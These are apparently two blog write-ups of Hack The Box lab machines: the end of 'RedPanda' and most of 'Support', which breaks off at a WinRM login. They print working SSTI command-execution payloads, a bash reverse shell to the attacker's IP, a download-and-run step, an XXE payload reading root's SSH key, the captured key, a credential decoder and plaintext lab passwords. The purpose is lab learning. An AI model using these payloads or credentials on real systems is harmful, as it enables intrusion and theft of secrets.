The majority of special characters were handled correctly. However, the backslash, plus symbol and squiggly brackets all produced a 500 error. Squiggly brackets can be used to perform Server Side Template Injection or SSTI attacks. SSTI is when the threat actor injects code into a server-side template that then gets processed by the server. For example, if you were to submit ‘{{7*7}}’ to the application and the response returned 49, you could presume that the application was susceptible to SSTI. Go to HackTricks for a better explanation.

In summary, we know that the technology being used is Spring Boot. Furthermore, we know that the application is likely vulnerable to Server Side Template Injection. Lucky for us, HackTricks have already done the work and have payloads for these exact conditions. The payload below, when executed should execute the id command on the server and return the results back in the response.

*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
Spring Boot Server Side Template Injection

RedPanda Pawhold

We have code execution via Server Side Template Injection. The next step was to leverage this to get a reverse shell. First, I created a bash script on my local host that would create a TCP connection back to my IP address on port 1337.

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.126/1337 0>&1

Next, I span up a Python3 web server in the same directory as the bash script. I then visited the URL in my browser to confirm the script was accessible. I right-clicked the script and copied the URL.

┌─[[email protected]]─[~/RedPanda]
└──╼ $python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Then, I created a netcat listener on port 1337 so that when the script is executed on the target server, something is there to catch it when it makes the connection attempt.

┌─[[email protected]]─[~/RedPanda]
└──╼ $sudo nc -lvnp 1337
listening on [any] 1337 ...

I then modified the payload so that it would perform a ‘wget’ to the bash script and download it.

*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('wget http://10.10.14.126:8000/shell.sh').getInputStream())}
Burp SSTI List Files

Submitting this command to the search box or via the name parameter in Burp appeared to do the trick. However, I had to change the permissions on the file before I could execute it. You could argue that I should have just used ‘chmod +x’ instead of ‘chmod 777’ but I don’t care, not my circus, not my pandas.

*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('chmod 777 shell.sh').getInputStream())}
777 Permissions on shell.sh

I sent one final request to the server to politely ask it to execute my script. The application hung.

*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('./shell.sh').getInputStream())}

But sure enough, I got a reverse shell. This dropped us into a shell as the ‘woodenk’ user. From here I was able to grab the user flag.

┌─[[email protected]]─[~/RedPanda]
└──╼ $sudo nc -lvnp 1337
[sudo] password for joe: 
listening on [any] 1337 ...
connect to [10.10.14.126] from (UNKNOWN) [10.129.247.33] 44842
[email protected]:/tmp/hsperfdata_woodenk$ cat /home/woodenk/user.txt
cat /home/woodenk/user.txt
10a▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓caf

Things Get Really Hardcore

It was about this time that I had fallen into a false sense of security. I knew what I was doing, so far so good, this was easy. Well, things were about to take a turn. On easy Linx machines, I would normally expect to see a script that calls a binary without an absolute path. Or perhaps you have ‘sudo’ that lets you run a ‘SUID’ binary with a well-known escape. I would have even been happy with a kernel exploit. A well-known public exploits that you can find easily with tools like LinEnum or LinPEAS. NOPE!

Now that we have access to the box, we should upgrade our shell. We’re civilised human beings after all. Why wouldn’t we want the full features available to us? Using the Python stty trick I was able to upgrade my shell to a fully functional one.

[email protected]:/tmp/hsperfdata_woodenk$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<enk$ python3 -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/tmp/hsperfdata_woodenk$ ^Z
[1]+  Stopped                 sudo nc -lvnp 1337

┌─[✗]─[[email protected]]─[~/RedPanda]
└──╼ $stty raw -echo

┌─[[email protected]]─[~/RedPanda]
sudo nc -lvnp 1337
[email protected]:/tmp/hsperfdata_woodenk$ stty rows 36 cols 170
[email protected]:/tmp/hsperfdata_woodenk$ export TERM=xterm

RedPanda Authenticated Enumeration

Next, I threw LinEnum and LinPEAS onto my Python web server and downloaded them to /tmp on RedPanda. I made them executable and ran them. I found nothing! Not knowing what to do next, I downloaded the official walkthrough and visited Youtube. Using the official walkthrough I was able to locate the credentials stored in the following file. It’s odd that neither of the enumeration scripts found them. They were quite obviously credentials.

[email protected]:/opt/panda_search/src/main/java/com/panda_search/htb/panda_search$ cat MainController.java

The credentials in that file were for the user ‘woodenk’ and provided SSH access to the box. However, it probably isn’t a good idea to SSH to the box. The reason why is that the application process that we hacked to get our reverse shell is a member of the logs group. The user ‘woodenk’ is not a member of the logs group. We will need this group’s permission to perform our privilege escalation (I think) and logging in via SSH will remove it from us. So while we’re logged in as ‘woodenk’ and shouldn’t be in the logs group, the process that we hacked is and thus we are in the logs group. I have no idea how that works.

Finding Files

By this point, I was lost completely and just following along with IppSec’s video. I will try to keep things short and sweet but if you want a detailed explanation of the privilege escalation, go watch his video. We start by looking for files that belong to the logs group. The output below shows that the file’s user owner is root but the group owner is logs. This is interesting.

[email protected]:find / -group logs 2>/dev/null
/opt/panda_search/redpanda.log
[email protected]:/opt/panda_search$ ls -laSh
total 48K
-rwxrwxr-x 1 root root 9.9K Jun 14  2022 mvnw
-rw-rw-r-- 1 root root 6.5K Feb 21  2022 mvnw.cmd
drwxrwxr-x 5 root root 4.0K Jun 14  2022 .
drwxr-xr-x 5 root root 4.0K Jun 23  2022 ..
drwxrwxr-x 3 root root 4.0K Jun 14  2022 .mvn
drwxrwxr-x 4 root root 4.0K Jun 14  2022 src
drwxrwxr-x 9 root root 4.0K Jun 22  2022 target
-rw-rw-r-- 1 root root 2.6K Apr 27  2022 pom.xml
-rw-rw-r-- 1 root logs    1 Mar 13 12:18 redpanda.log

So next we search for references to this log file in other locations on the system. There is likely to be a binary or script somewhere doing something with this log file. As you can see from the output below, there are two java applications that mention the redpanda.log file. One in the log parser app and one in panda_search app. I don’t know much about Java so a lot of this is new to me.

[email protected]:/opt/panda_search$ grep -R redpanda.log /
Binary file /opt/panda_search/target/classes/com/panda_search/htb/panda_search/RequestInterceptor.class matches
/opt/panda_search/src/main/java/com/panda_search/htb/panda_search/RequestInterceptor.java:        FileWriter fw = new FileWriter("/opt/panda_search/redpanda.log", true);
Binary file /opt/credit-score/LogParser/final/target/classes/com/logparser/App.class matches
/opt/credit-score/LogParser/final/src/main/java/com/logparser/App.java:        File log_fd = new File("/opt/panda_search/redpanda.log");

RedPanda Privilege Escalation

I haven’t included the code and I’m not going to try and explain it. After watching IppSec’s video I somewhat understand what’s going on but I couldn’t tell you which part of the binary does what. However, from what I understand these two binaries do a number of things. They read the redpanda.log file and if they see a request for an image, they process that image and then write the metadata author attribute to an XML file. So, if we create an image and modify the metadata to perform a file traversal to an XML file of our own creation, we can then use XML Entity Injection to execute code and retrieve files that we’re not supposed to.

Capturing A Panda

First, we need to capture a panda. Once we have this panda, we can modify its metadata using exiftool and give it a different author attribute. The snippet below shows that I have changed the author attribute to ‘../dev/shm/haxez’. So now, when it attempts to write to the XML file it will first perform a path traversal up out of the ‘/credits’ directory (where the XML is usually stored) and into ‘/dev/shm’ where our haxez XML file is stored. We caught this panda in the ‘img’ directory but when releasing it back to the wild we won’t have permission to put him back there. Probably best to drop him off in the /dev/shm directory and let him make his own way back.

Greg
┌─[[email protected]]─[~/RedPanda]
└──╼ $exiftool -Artist=../dev/shm/haxez greg.jpg 
Warning: [minor] Ignored empty rdf:Bag list for Iptc4xmpExt:LocationCreated - greg.jpg
    1 image files updated
┌─[[email protected]]─[~/RedPanda]
└──╼ $exiftool greg.jpg
ExifTool Version Number         : 12.16
File Name                       : greg.jpg
Directory                       : .
File Size                       : 100 KiB
File Modification Date/Time     : 2023:03:13 13:08:39+00:00
File Access Date/Time           : 2023:03:13 13:08:39+00:00
File Inode Change Date/Time     : 2023:03:13 13:08:39+00:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Orientation                     : Horizontal (normal)
Artist                          : ../dev/shm/haxez
RedPanda Artist Attribute

XML Entity Injection Attack

So when the cronjob runs, it will see the Artist value in the image and traverse directories from credits up a directory to /credits/../dev/shm/haxez_creds.xml and look for a haxez_creds.xml file. Then in that file, we perform an XML Entity Injection attack to steal the root user’s private key. This is not easy! Why is this machine marked as easy?! Let’s steal an XML template from the /credits directory and modify it with our payload. An example of this can be found on HackTricks. As you can see from the snippet below, we specify the root user’s private key in the entity entry. Then, further down we specify the location where we want the contents of that file to be written to (I think).

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///root/.ssh/id_rsa" > ]>
<credits>
  <author>haxez</author>
  <image>
    <uri>/../../../../../../../../dev/shm/haxez.jpg</uri>
    <views>0</views>
   <data>&xxe;</data>
  </image>
  <totalviews>0</totalviews>
</credits>
RedPanda XXE

Triggering The Exploit

In order for the exploit to be triggered, we need to put something in the redpanda.log file. This is why we need the logs group permission. The snippet below shows me echoing a fake request to the image we created. It includes a traversal to our /dev/shm directory where are panda was released back into the wild. Then when the corn job runs, it finds the image, reads the metadata, executes the XML entity injection and saves the root user’s private key in our XML file. WTF man!

[email protected]:/opt/panda_search$ echo '200||10.10.14.126||Mozilla/5.0 (Windows NT 10.0; rv78.0) Gecko/20100101 Firefox/78.0||/../../../../../../../../dev/shm/haxez.jpg' > redpanda.log

[email protected]:/opt/panda_search$ cat redpanda.log 
200||10.10.14.126||Mozilla/5.0 (Windows NT 10.0; rv78.0) Gecko/20100101 Firefox/78.0||/../../../../../../../../dev/shm/haxez.jpg

Got root?

After twiddling our thumbs for a bit, and waiting for the cronjob to execute we can cat the XML file. As you can see from the snippet below it now contains the root user’s private key. We can then save this key locally, give it 600 permissions and use it to SSH to the server as the root user and capture the root flag.

[email protected]:/opt/panda_search$ cat /dev/shm/haxez_creds.xml 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo>
<credits>
  <author>haxez</author>
  <image>
    <uri>/../../../../../../../../dev/shm/haxez.jpg</uri>
    <views>1</views>
    <data>-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACDeUNPNcNZoi+AcjZMtNbccSUcDUZ0OtGk+eas+bFezfQAAAJBRbb26UW29
ugAAAAtzc2gtZWQyNTUxOQAAACDeUNPNcNZoi+AcjZMtNbccSUcDUZ0OtGk+eas+bFezfQ
AAAECj9KoL1KnAlvQDz93ztNrROky2arZpP8t8UgdfLI0HvN5Q081w1miL4ByNky01txxJ
RwNRnQ60aT55qz5sV7N9AAAADXJvb3RAcmVkcGFuZGE=
-----END OPENSSH PRIVATE KEY-----</data>
  </image>
  <totalviews>1</totalviews>
</credits>

And ssh to capture the flag.

┌─[[email protected]]─[~/RedPanda]
└──╼ $ssh -i key [email protected]
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-121-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Mon 13 Mar 2023 01:25:21 PM UTC
  System load:           0.02
  Usage of /:            81.0% of 4.30GB
  Memory usage:          50%
  Swap usage:            0%
  Processes:             225
  Users logged in:       1
  IPv4 address for eth0: 10.129.247.33
  IPv6 address for eth0: dead:beef::250:56ff:fe96:bf03
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Jun 30 13:17:41 2022

[email protected]:~# cat /root/root.txt
e8a▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ff4

RedPanda Review

I definitely don’t agree with the easy categorisation of this box. This box was at least a medium-difficulty box. The reason I say that is because most of the easy boxes I have done (about 45 at the time of writing) make it easier to understand what needs to be done. Normally the privilege escalation will be staring you in the face but you need to work out how to trigger it. Whether it’s due to my lack of knowledge of Java or something else I’m missing, I had no clue what I was expected to do here.

Additionally, easy boxes normally only require you to perform a single attack per phase. For users, you could find a way to perform remote code execution and get a shell. For root, you could leverage a SUID binary and use GTFO bins to escape a restricted shell. My point is, they usually leverage some publically known exploit or misconfiguration to elevate your privileges. Yes, you could argue that this box did exactly that. From having the log files group permission to performing publically known exploits like file path traversal and XXE.

What’s My Point?

My point is, it wasn’t “easy” to understand what I had to do. Furthermore, it required chaining multiple attacks together to be successful. I wouldn’t even know what questions to ask in order to be successful on this machine. My automated enumeration tools didn’t find anything, I would argue that a requirement for easy boxes should be that the path to root can be found with automated tools. Don’t get me wrong, the machine is a work of art and the creator did a fantastic job. However, it is not an easy box to complete.

Then again, looking at the user rankings most easy boxes aren’t. It seems that most easy boxes have a score between 3 to 5 which gives them an amber score. Surely that means that these boxes should be considered medium-difficulty boxes. Easy boxes should fall between 1 and 3 and be completely green. Unless we count the super easy boxes which aren’t included.

The Hack The Box Learning Curve

If a box is marked easy then it should be easy. For someone with experience who completes labs regularly, it should teach them something new without sending them into a spiral of frustration and self-doubt. There are a lot of boxes like this that I believe are incorrectly categorised. My colleagues and friends often joke that the Hack The Box learning curve is a brick wall. Yes, hacking is hard! cybersecurity is hard! but when you mark a box as easy and I end up having no clue what I’m supposed to do or even what questions to ask, what am I supposed to think?

I will regret writing this but know that it is purely out of frustration. I’m sure many others have been in the exact same situation and mindset as me right now. I’m hoping that this is a glass ceiling that I can break through but right now… right now it feels like a brick wall that I’m repeatedly smashing my face into. RIP RedPanda.

Make Code Comments Mandatory

One final thing. In addition to the Java apps being easier to find, the code within them should have been commented. This would have made it easier to understand what it was doing. Every software development module I took at college or university repeatedly expressed how important it is to put comments in your code. Is it really outside the realm of the possibility that someone would have made code comments? and would it have made the box too easy for an easy box? just a thought.

Hack The Box Support Writeup

Hello world and welcome to Haxez, today I’m going to attempt to complete the Hack The Box Windows machine Support. The box is rated easy. However, my Windows skills leave a lot to be desired so this should be an interesting one. I might need some… support.

Enumerating Support

As per usual, I first confirmed the box was online. Unfortunately, the machine didn’t respond to pings. I believe that ICMP was disabled (as is the norm on Windows). So, I ran a quick Nmap non-ping scan (-Pn) to confirm the box was online before full aggressive scan mode.

┌─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Support]
└──╼ $sudo nmap -sC -sV -p- -Pn -O -A --script vuln --reason 10.129.227.255 -oA support
[sudo] password for joe: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 10:38 GMT
Nmap scan report for 10.129.227.255
Host is up, received user-set (0.012s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-03-12 10:40:46Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49705/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2016 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (87%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   12.13 ms 10.10.14.1
2   12.25 ms 10.129.227.255
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 354.12 seconds

There were a lot of services open. This machine is likely simulating a domain controller. Furthermore, there are no web services listening so we won’t be doing any web attacks for a foothold. Next, I ran enum4linux against the host which didn’t return much useful information. After that, I ran smbclient to see if we could enumerate shares.

┌─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Support]
└──╼ $sudo smbclient -N -L \\\\10.129.227.255
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	support-tools   Disk      support staff tools
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

For some reason my Parrot virtual machine hates crackmapexec so I’ve switched to a Kali one. I will try to fix it later but for now, I want to focus on the lab. Anyway, here is the result of enumerating Server Message Block (smb) with crackmapexec.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Support]
└─$ sudo crackmapexec smb 10.129.227.255
SMB         10.129.227.255  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)

We can also enumerate shares this way. It is always good to know multiple tools that perform the same function I suppose. Here, I have used a random non-existing username but haven’t supplied a password. I believe this falls back to an anonymous authentication and allows us to enumerate the shares. Furthermore, something worth noting is that crackmapexec informs us we have read access to IPC$ and support-tools.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Support]
└─$ sudo crackmapexec smb 10.129.227.255 --shares -u 'haxez' -p ''
SMB         10.129.227.255  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.129.227.255  445    DC               [+] support.htb\haxez: 
SMB         10.129.227.255  445    DC               [+] Enumerated shares
SMB         10.129.227.255  445    DC               Share           Permissions     Remark
SMB         10.129.227.255  445    DC               -----           -----------     ------
SMB         10.129.227.255  445    DC               ADMIN$                          Remote Admin
SMB         10.129.227.255  445    DC               C$                              Default share
SMB         10.129.227.255  445    DC               IPC$            READ            Remote IPC
SMB         10.129.227.255  445    DC               NETLOGON                        Logon server share 
SMB         10.129.227.255  445    DC               support-tools   READ            support staff tools
SMB         10.129.227.255  445    DC               SYSVOL                          Logon server share 

Sharing Is Caring

Now that we know we have READ access to support-tools, we can connect to it and have a look around using the tool smbclient. As you can see from the output below, there are a number of zip files and executables. Some of them appear to be tools that we’re familiar with like Putty and Wireshark. However, one of them stands out as it is likely a custom binary. The date on this binary is also different to the others so it does stand out like a sore thumb.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Support]
└─$ smbclient -N //10.129.227.255/support-tools                   
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022
4026367 blocks of size 4096. 968680 blocks available

I downloaded the archive using the get command and then extracted it. There were a number of dll files and the executable itself.

┌──(kali㉿kali)-[/media/…/Hack The Box/Machines/Support/user]
└─$ unzip UserInfo.exe.zip 
Archive:  UserInfo.exe.zip
  inflating: UserInfo.exe            
  inflating: CommandLineParser.dll   
  inflating: Microsoft.Bcl.AsyncInterfaces.dll  
  inflating: Microsoft.Extensions.DependencyInjection.Abstractions.dll  
  inflating: Microsoft.Extensions.DependencyInjection.dll  
  inflating: Microsoft.Extensions.Logging.Abstractions.dll  
  inflating: System.Buffers.dll      
  inflating: System.Memory.dll       
  inflating: System.Numerics.Vectors.dll  
  inflating: System.Runtime.CompilerServices.Unsafe.dll  
  inflating: System.Threading.Tasks.Extensions.dll  
  inflating: UserInfo.exe.config     

We can confirm the type of file this executable is using the file command on it.

┌──(kali㉿kali)-[/media/…/Hack The Box/Machines/Support/user]
└─$ file UserInfo.exe
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows

Decompiling Support Application

As per the official walkthrough, I’m going to use ILspy to decompile the executable. Once decompiled we can see that there are a number of functions. One of the functions is called LdapQuery which appears to be authenticating to the LDAP service on the host support.htb. We now know the name of the host (if we didn’t already from our other tools). We also know that this is somehow authenticating to the LDAP service. It also appears to be using the domain user ‘support\ldap’.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Support]
└─$ echo '10.129.178.26 support.htb' | sudo tee -a /etc/hosts
10.129.178.26 support.htb
UserInfo.exe Decompiled
UserInfo.exe Decompiled

Within the Protected section we can see ‘enc_password’ which appears contains the encoded password. Unfortunately, we can’t just use this string to authenticate to the LDAP service as the application performs a decoding operation before sending the query to the server.

private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
Support Encoded Password
Support Encoded Password

Fortunately, we also have access to the function that performs the decoding. The ‘getPassword’ section is the formula used to decode the encoded string. If we reverse-engineer this then we should be able to steal the ldap user’s password. Once we have the password, we should be able to gather more information from the system (creds or king).

Support Decoding function
Support Decoding function

Cracking The Encoding

I’m not much of a coder, I can write some basic scripts to automate things but if you gave me an operation and asked me to reverse it I would panic and go and hide somewhere. This is something I’m actively working on in my spare time but finding time is difficult. I tried (for a while), to write my own script to perform the decryption. It didn’t work, I then asked ChatGPT to try and fix my script (Bash) and it made it worse. Oddly, it then attempted to write it in Python but the output was wrong. So, I gave up and used the one in the official walkthrough.

Unfortunately, Credit to Official HTB Walkthrough.

import base64
from itertools import cycle

enc_password = base64.b64decode("0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E")
key = b"armando"
key2 = 223

res = ''

for e,k in zip(enc_password, cycle(key)):
    res += chr(e ^ k ^ key2)

print(res)

Wine and Wireshark

This script, when run will output the decoded password. Hopefully, we can use it to perform some more enumeration against the machine. I feel defeated. I do like the way IppSec solved this. In his video, he captures the traffic (generated by the executable) with Wireshark. That way you don’t have to decode it as you capture the password after it has been decoded and sent in the query to the server. I was able to replicate this approach after jumping some frustrating hurdles to get various things set up (Wine and Wine-Mono). Oddly, I wasn’t able to see DNS requests on the ‘any’ interface.

Support Domain Password Captured
Support Domain Password Captured
┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Support]
└─$ sudo python3 decrypt.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Support Further Share Enumeration

Now that we have the domain (support), the username (ldap), and the password (nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz), we can use crackmapexec again as an authenticated user and see if we have access to additional shares.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Support]
└─$ sudo crackmapexec smb 10.129.227.255 --shares -d support -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
[sudo] password for kali: 
SMB         10.129.227.255  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support) (signing:True) (SMBv1:False)
SMB         10.129.227.255  445    DC               [+] support\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz 
SMB         10.129.227.255  445    DC               [+] Enumerated shares
SMB         10.129.227.255  445    DC               Share           Permissions     Remark
SMB         10.129.227.255  445    DC               -----           -----------     ------
SMB         10.129.227.255  445    DC               ADMIN$                          Remote Admin
SMB         10.129.227.255  445    DC               C$                              Default share
SMB         10.129.227.255  445    DC               IPC$            READ            Remote IPC
SMB         10.129.227.255  445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.227.255  445    DC               support-tools   READ            support staff tools
SMB         10.129.227.255  445    DC               SYSVOL          READ            Logon server share 

I did some more digging around on the shares, specifically SYSVOL as I’ve heard it’s possible to get more credentials that way. Unfortunately, I didn’t find much or perhaps I did but didn’t know what I was looking for. Anyway, I think it’s time to change my approach and come at it from a different angle.

┌──(kali㉿kali)-[~]
└─$ sudo smbclient -U support/ldap \\\\10.129.227.255\\SYSVOL
Password for [SUPPORT\ldap]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat May 28 07:01:45 2022
  ..                                  D        0  Sat May 28 07:01:45 2022
  support.htb                        Dr        0  Sat May 28 07:01:45 2022

                4026367 blocks of size 4096. 967330 blocks available
smb: \> get support.htb
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \support.htb
smb: \> cd support.htb
smb: \support.htb\> dir
  .                                   D        0  Sat May 28 07:09:54 2022
  ..                                  D        0  Sat May 28 07:01:45 2022
  DfsrPrivate                      DHSr        0  Sat May 28 07:09:54 2022
  Policies                            D        0  Sat May 28 07:01:56 2022
  scripts                             D        0  Sat May 28 07:01:45 2022

                4026367 blocks of size 4096. 967330 blocks available
smb: \support.htb\> cd scripts
smb: \support.htb\scripts\> dir
  .                                   D        0  Sat May 28 07:01:45 2022
  ..                                  D        0  Sat May 28 07:09:54 2022

                4026367 blocks of size 4096. 967330 blocks available
smb: \support.htb\scripts\> cd ..
smb: \support.htb\> cd Policies
smb: \support.htb\Policies\> dir
  .                                   D        0  Sat May 28 07:01:56 2022
  ..                                  D        0  Sat May 28 07:09:54 2022
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sat May 28 07:01:56 2022
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sat May 28 07:01:56 2022

Who Let The Dogs Out

Now that we have a foothold of sorts, we can query Active Directory and look for misconfiguration that may allow us to elevate our privileges. I set up neo4j and then used pip to install bloodhound-python which is a python collector that you can use to gather information about the domain.

┌──(kali㉿kali)-[~]
└─$ sudo bloodhound-python --dns-tcp -ns 10.129.227.255 -d support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.support.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Found 21 users
INFO: Connecting to LDAP server: dc.support.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
WARNING: Failed to get service ticket for dc.support.htb, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: [Errno Connection error (dc.support.htb:88)] [Errno -2] Name or service not known
INFO: Done in 00M 02S

While setting up bloodhounds and running it was a fun exercise to sharpen skills. Unfortunately, it didn’t get me anything good. There were no paths from the LDAP user to Domain Admin or other high-profile targets.

Bloodhound

I tried moving on to ldapsearch but guess what? it didn’t work. For some reason, it didn’t like me passing it hyphens even though that’s the format it requires. Every time I tried running the tool it would error out. Getting sick of things not working now. I tried going from argument to argument but it just wouldn’t accept it. So I guess we move on to another too.

┌──(kali㉿kali)-[/media/…/Hack The Box/Machines/Support/bloodhound]
└─$ ldapsearch -h support.htb -D [email protected] -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb"    
ldapsearch: unrecognized option -

Apache Saves The Day

Thank fu*k for the Apache Software Foundation. Just that, they are amazing and build amazing products. The Apache Directory Studio allows you to connect to LDAP and browse the active directory. It’s as simple as that. I didn’t know about it until now but I will definitely be adding this to my list of go-to tools. Almost every tool I have used today has broken, no idea why but they just stopped working, I downloaded this tool, extracted it and it worked. That’s it. Pop in the domain details and you’re done.

Apache Directory Studio
Apache Directory Studio

We know from our bloodhound output that the support user was a high-profile target as it appeared to have a clear path to Domain Admin. Well, this tool shows that the support user has a very interesting note on their active directory account.

Ironside47pleasure40Watchful

Perhaps this is a password. Let’s try it. It worked and we can now grab the user flag from the desktop.

┌──(kali㉿kali)-[~/Downloads/ApacheDirectoryStudio]
└─$ evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
